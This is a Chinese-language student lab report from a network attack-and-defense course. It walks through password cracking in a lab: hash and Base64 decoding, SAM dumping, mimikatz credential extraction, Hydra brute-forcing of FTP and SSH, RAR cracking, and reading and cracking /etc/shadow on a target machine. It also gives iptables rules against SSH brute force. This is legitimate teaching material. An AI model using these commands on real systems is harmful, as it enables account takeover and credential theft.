實驗報告三

學   號 201721450020

中國人民公安大學

Chinese people’ public security university

網路對抗技術

實驗報告

資訊技術與網路安全學院

2019年12月9日

實驗任務總綱

2019—2020學年 第 一學期

一、實驗目的

1．加深并消化本課程授課內容，復習所學過的互聯網搜索技巧、方法和技術；

2．了解并熟悉常用加密演算法、加解密工具、破解工具等互聯網資源，對給定的密文、加密檔案、系統密碼進行破解；

3．達到鞏固課程知識和實際應用的目的，

二、實驗要求

1．認真閱讀每個實驗內容，需要截圖的題目，需清晰截圖并對截圖進行標注和說明，

2．檔案要求結構清晰，圖文表達準確，標注規范，推理內容客觀、合理、邏輯性強，

3．軟體工具可使用john the ripper或hydra、字典生成器、pwdump7等，

4．實驗結束后，保留電子檔案，

三、實驗步驟

1．準備

提前做好實驗準備，實驗前應把詳細了解實驗目的、實驗要求和實驗內容，熟悉并準備好實驗用的軟體工具，按照實驗內容和要求提前做好實驗內容的準備，

2．實驗環境

描述實驗所使用的硬體和軟體環境（包括各種軟體工具）；

開機并啟動軟體office2003或2007、瀏覽器、加解密軟體，

3．實驗程序

1）啟動系統和啟動工具軟體環境，

2）用軟體工具實作實驗內容，

4．實驗報告

按照統一要求的實驗報告格式書寫實驗報告，把按照模板格式撰寫的檔案嵌入到實驗報告檔案中，檔案按照規定的書寫格式書寫，表格要有表說圖形要有圖說，

任務（一）

請解密以下字串35556C826BF3ADDFA2BB0F86E0819A6C，（附截圖）

答：PPSUC

2.

這好像是一段歌詞，請解密后告訴我歌名，

V2hlbiBJIGFtIGRvd24gYW5kLCBvaCBteSBzb3VsLCBzbyB3ZWFyeTsKV2hlbiB0cm91YmxlcyBjb21lIGFuZCBteSBoZWFydCBidXJkZW5lZCBiZTsKVGhlbiwgSSBhbSBzdGlsbCBhbmQgd2FpdCBoZXJlIGluIHRoZSBzaWxlbmNlLApVbnRpbCB5b3UgY29tZSBhbmQgc2l0IGF3aGlsZSB3aXRoIG1lLgpZb3UgcmFpc2UgbWUgdXAsIHNvIEkgY2FuIHN0YW5kIG9uIG1vdW50YWluczsKWW91IHJhaXNlIG1lIHVwLCB0byB3YWxrIG9uIHN0b3JteSBzZWFzOwpJIGFtIHN0cm9uZywgd2hlbiBJIGFtIG9uIHlvdXIgc2hvdWxkZXJzOwpZb3UgcmFpc2UgbWUgdXDigKYgVG8gbW9yZSB0aGFuIEkgY2FuIGJlLgpZb3UgcmFpc2UgbWUgdXAsIHNvIEkgY2FuIHN0YW5kIG9uIG1vdW50YWluczs=

 答:

When I am down and, oh my soul, so weary;

When troubles come and my heart burdened be;

Then, I am still and wait here in the silence,

Until you come and sit awhile with me.

You raise me up, so I can stand on mountains;

You raise me up, to walk on stormy seas;

I am strong, when I am on your shoulders;

You raise me up… To more than I can be.

You raise me up, so I can stand on mountains;

任務（二）

 windows系統密碼破解

1.在windows xp系統中使用 net user abc abc123 /add添加用戶abc，密碼abc123的賬戶（用戶名和密碼可以自己設定）；并使用net user命令確定用戶添加成功， 

2.使用pwdump軟體匯出本機的sam檔案

3.使用saminside軟體將sam.txt匯入，并進行破解:

配置密碼字典：

選擇使用字典破解：

破解出密碼：

用戶名是abc密碼是abcabc123

如果遇到復雜密碼的LM值破解時間長，可以使用在線破解的方式，

任務（三）

記憶體密碼提取

在系統中為abc用戶設定一個高強度密碼，

使用minikatz工具對系統的密碼進行提取，涉及兩條命令

第一條：privilege::debug //提升權限 第二條：sekurlsa::logonpasswords //抓取密碼

答：破解得到用戶名abc密碼abcabc123 

任務（四）

遠程服務密碼破解

兩個同學配合完成，A同學搭建FTP服務器，并新建用戶，并設定登陸密碼

B同學使用hydra 對ftp用戶的密碼進行字典破解，hydra 中有關于該軟體的使用命令語法，字典檔案需要自己去生成，

生成字典后用一下命令進行破解

HYDRA -l abc -P 1.txt ftp://192.168.31.164

跑出結果，用戶名是abc密碼是123

任務（五）

應用程式密碼破解

使用ARCHPR軟體破解，給出的RAR target檔案的密碼，并查看壓縮包中的內容

破解軟體和RAR target均在前面給出的鏈接里，

答：破解出密碼是eno

任務（六）

完成對給定靶機的密碼破解，并獲取root權限，程序如下：

1.通過對網頁的郵箱提取，形成用戶表和密碼表

2.通過nmap掃描發現其開放埠

3. 通過ssh協議破解獲取登陸密碼

4. 登陸后查看用戶的權限和用戶組

5. 提權獲取shadow檔案內容

6.通過對shadow檔案破解獲取root密碼

答：先搭建網頁

yum install httpd -y

sudo chmod 777 /var/www/html

在上述檔案夾內創建網頁，

sudo setsebool -P httpd_read_user_content=1

systemctl start firewalld

firewall-cmd --zone=public --add-port=80/tcp --permanent

firewall-cmd –reload

service httpd restart

完成效果：

對靶機的網頁進行郵箱提取：

curl http://192.168.129.4 | grep -E -o "[a- zA- Z0- 9_-] +@[ a- zA- Z0- 9_- ] +(\.[a- zA- Z0- 9_- ]+)"

掃描靶機：

nmap -T4 -A -v 192.168.129.4

靶機可能開啟了ssh對其進行字典爆破：

hydra -L username.txt -P password.txt -t 5 ssh://192.168.129.4

上述圖片找到了一個密碼，測驗該密碼發現可以成功登錄：

ssh -l zhenghaowen 192.168.129.4

查看用戶和權限資訊：

cat /etc/passwd

查看用戶的組資訊：

cat /etc/group

提權獲取shadow檔案內容：

sudo cat /etc/shadow

將/etc/passwd匯出到文本passwd.txt

將/etc/shadow匯出到文本shadow.txt

文本放到john the ripper程式運行目錄下執行命令：

unshadow.exe passwd.txt shadow.txt > target.txt

使用john the ripper進行破解，

輸入john -format=sha512crypt-opencl –wordlist=passwords.txt target.txt命令使用passwords.txt字典暴力破解

獲取到相關密碼，嘗試切換用戶提權：

sudo su

成功提權，

對于ssh暴力破解可以設定嘗試一定次數錯誤密碼登錄后無法繼續嘗試多少多少秒，

iptables -I INPUT -p tcp --dport 22 -i eth0 -m state --state NEW -m recent –set

iptables -I INPUT -p tcp --dport 22 -i eth0 -m state --state NEW -m recent --update --seconds 120 --hitcount 3 -j DROP

相關工具：

john the ripper-windows版

https://www.openwall.com/john/k/john-1.9.0-jumbo-1-win64.7z

hydra - windows版

https://pan.baidu.com/s/1LQ1ituR5yGPhaTnT1FTTNg

宣告：凡因違規瀏覽而引起的任何法律糾紛，本人概不負責！

標籤：其他

上一篇：華為eNSP路由交換實驗-生成樹之RSTP

下一篇：Cisco 7200 路由 PPPOE 撥號詳解